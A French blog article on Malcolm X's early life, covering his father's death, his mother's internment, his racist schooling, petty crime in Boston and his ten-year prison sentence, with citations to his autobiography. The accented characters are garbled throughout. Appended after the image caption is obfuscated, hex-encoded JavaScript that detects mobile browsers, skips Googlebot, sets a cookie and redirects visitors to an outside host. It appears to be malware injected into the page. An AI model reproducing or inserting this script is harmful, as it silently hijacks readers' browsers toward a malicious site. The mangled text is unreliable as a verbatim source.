Malcolm X, contemporain de Martin Luther King, a, contrairement A� ce dernier, souvent A�tA� assimilA� A� la lutte et A� la violence.  Pourtant, vers la fin de sa vie,  Malcolm na��y voit lA� que le rA�sultat de la propagande mA�diatique, friande de scandales et de dA�clarations scabreuses mais pourtant absente lorsque les discours A�voluent positivement. A� On ma��accusait sans cesse da��inciter les Noirs A� la rA�volte, A� la violence [a��] Dans tous mes discours, ja��essayais de clarifier ma nouvelle position A� la��A�gard des Blancs, mais les journalistes prA�fA�raient que mon nom demeure synonyme de violence A�.[1]

Malcolm X, de son vrai nom Malcolm Little, est nA� le 19 mai 1925 A� Omaha, au NA�braska. Il est le quatriA?me de la fratrie, nA� da��un charpentier noir, rA�vA�rend et prA?cheur baptiste qui appelle au retour des afro-amA�ricains en Afrique, et de Louise Little (nA�e Louisa Norton). Celle-ci, da��origine antillaise, au teint plus clair, se rappelle chaque jour devant son miroir qua��elle est nA�e du viol de sa mA?re par un homme blanc.

Des membres du Ku Klux Klan, organisation suprA�matiste blanche, tentent da��intimider la famille du rA�vA�rend Little A� plusieurs occasions. Un soir, la maison familiale est incendiA�e par des chevaliers du K.K.K. puis, quelques temps plus tard, le pA?re de Malcolm, le rA�vA�rend Little, est retrouvA� mort dans de A� obscures A� conditions. Le petit Malcolm na��a que six ans et malgrA� que tout porte A� croire que son pA?re a A�tA� lA?chement assassinA�, sauvagement battu et jetA� aux rails du train, la police conclue A� un suicide,  classant la��affaire sans suite.

Orphelin de pA?re, il est dA?s lors A�levA� par sa mA?re et vit, avec ses frA?res et sA�urs, dans des conditions pitoyables. Madame Little, dA�passA�e, fragilisA�e socialement, A�conomiquement et psychologiquement rejoint une secte, les adventistes du 7A?me jour. Ceci na��arrange pas ses problA?mes, que du contraire, ses enfants lui sont retirA�s et sont placA�s. DA�sespA�rA�e, elle perd totalement le sens des rA�alitA�s et est internA�e.

Malcolm grandit dans une atmosphA?re da��exclusion : da��exclusion sociale, da��exclusion raciale et da��exclusion familiale. Sa famille est dA�chirA�e, il a de la haine pour le Blanc ainsi que pour la sociA�tA� amA�ricaine en gA�nA�ral, celle-lA� mA?me qui na��a pas eu de pitiA� pour sa famille. Paradoxalement, malgrA� son sentiment de rA�volte, Malcolm reste un A�lA?ve brillant, douA� et ambitieux, ce qui lui permet da��A?tre admis dans un A� LycA�e de Blancs A�. Il y devient une sorte de mascotte, le sympathique camarade nigger, le petit Black presque frA�quentable. Son professeur da��anglais, conscient de ses capacitA�s, lui demande un jour ce qua��il voudra faire plus tard. Malcolm rA�pond qua��il voudrait devenir avocat, A� quoi le professeur, stupA�fiA�, lui rA�pond : A� Malcolm, dans la vie il faut A?tre rA�aliste avant tout. Comprends-moi bien. Ici nous ta��aimons tous, tu le sais. Mais tu es un nigger [a��]. Tu devrais rA�flA�chir A� ce que pourrais devenir. Tu es habile de tes mains. [a��] Pourquoi ne pas devenir menuisier ? A�[2]

Conscient qua��il a les qualitA�s mais qua��il na��a pas la couleur de peau qui va avec, il grandit dans la contradiction et le paradoxe : il hait les Blancs pour ce qua��ils lui ont fait mais, au fond, veut leur ressembler. Il vit, en quelque sorte, un rejet intellectuel par la��esprit mais une attraction sentimentale inconsciente. Quelque temps plus tard, perturbA�, dA�motivA�, il arrA?te ses A�tudes secondaires et va sa��installer chez sa sA�ur A� Boston. Son discours est raciste, pA�nA�trA� de duretA�, mais son apparence, elle, trahit ses profondes contradictions: il se dA�frise les cheveux, se poudre la peau afin de la blanchir et sa��habille comme ces Blancs qua��il dA�teste pourtant tant. Il dira plus tard,  se remA�morant ces annA�es de jeunesse : A�  Ce que je pouvais A?tre ridicule ! Ja��admirais devant la glace un Noir avec des cheveux A� blancs A� ! Je me jurai de na��avoir plus jamais les cheveux crA�pus, et effectivement je les ai dA�frisA�s rA�guliA?rement pendant des longues annA�es A�[3].

A� Je venais de faire mon premier pas vers la dA�gradation de soi. Ja��avais rejoint cette multitude da��hommes et de femmes noirs qui, en AmA�rique, A� force de bourrages de crA?ne, finissent par croire que les Noirs sont « infA�rieurs » a�� et les Blancs, « supA�rieurs » a�� A� tel point qua��ils na��hA�sitent pas A� mutiler et A� profaner les corps que Dieu leur a donnA�s, pour essayer da��avoir la��air « chouette » selon les critA?res des Blancs. A�[4]

Pour rA�capituler, malgrA� sa haine pour le Blanc, il tente de lui ressembler, mais le Blanc, lui, lui rappelle constamment qua��il est Noir, ce qui fait grandir sa haine mais non son dA�sir de lui ressemblera�� Il aimerait sa��intA�grer dans la sociA�tA� mais se sent constamment rejetA� pour ce qua��il est. Ca��est alors qua��il commence A� se droguer et A� commettre des petits dA�lits, des vols et des trafics en tout genre. De cette faA�on, comme la��explique Tariq Ramadan,  il sa��intA?gre par la marge, ne devenant pour certains qua��un A� dA�chet A� de la sociA�tA�, il a au moins la��impression da��enfin y appartenir rA�ellement.

SubmergA� par sa haine intA�rieure, la drogue et la��alcool, il commet des cambriolages et des braquages. Il a la personnalitA� dA�chirA�e : intellectuellement rA�voltA� contre la sociA�tA� blanche, il est sentimentalement aliA�nA� et court derriA?re les femmes qui ne sont pas de couleur. SA�duire les Banches est synonyme de rA�ussite, de dA�passement.  Da��ailleurs, ca��est en compagnie de deux femmes blanches, que Malcolm et son ami Shorty sont arrA?tA�s en flagrant dA�lit A� la suite da��un cambriolage. Cette arrestation va marquer la fin de la premiA?re pA�riode cruciale de sa vie.

Les peines de prison tombent et sont trA?s lourdes, enfina�� uniquement pour Malcolm et Shorty, pas pour les deux jeunes femmes blanches, A� assurA�ment A� sous leur influence. Malcolm, alors A?gA� de vingt ans, A�cope da��une peine de dix annA�es de prison.[5] Le crime de ces deux A� Noirs A� a�� qui condamnA�s pour la premiA?re fois ne bA�nA�ficient pourtant pas de la��allA�gement de peine prA�vu par la loi a�� ne semble pas A?tre rA�ellement le cambriolage, mais plutA?t leur relation avec des Blanches : A� Tout ce qua��ils voyaient, ca��est que nous avions pris des femmes qui appartenaient aux Blancs A�[6].

PARTIE 2 : https://raisonnances.net/malcolm-x-2eme-partie-de-la-prison-a-la-nation-of-islam/

 


Sources :

Malcolm X (et Alex Haley), La��autobiographie de Malcolm X, Paris, Presses Pocket, 1993

Tariq Ramadan, La vie de Malcolm X, https://www.youtube.com/watch?v=0pnapPMPEWA

[1] Malcolm X (et Alex Haley), La��autobiographie de Malcolm X, Paris, Presses Pocket, 1993, p. 293.

[2] Malcolm X, op. cit., p. 61.

[3] Malcolm X, op. cit., p. 79.

[4] Malcolm X, ibidem.

[5] Il sera finalement libA�rA� aprA?s 7 annA�es derriA?re les barreaux.

[6] Malcolm X, op. cit., p. 128.

Image : Malcolm Little au commissariat de police. Boston, 1944.var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}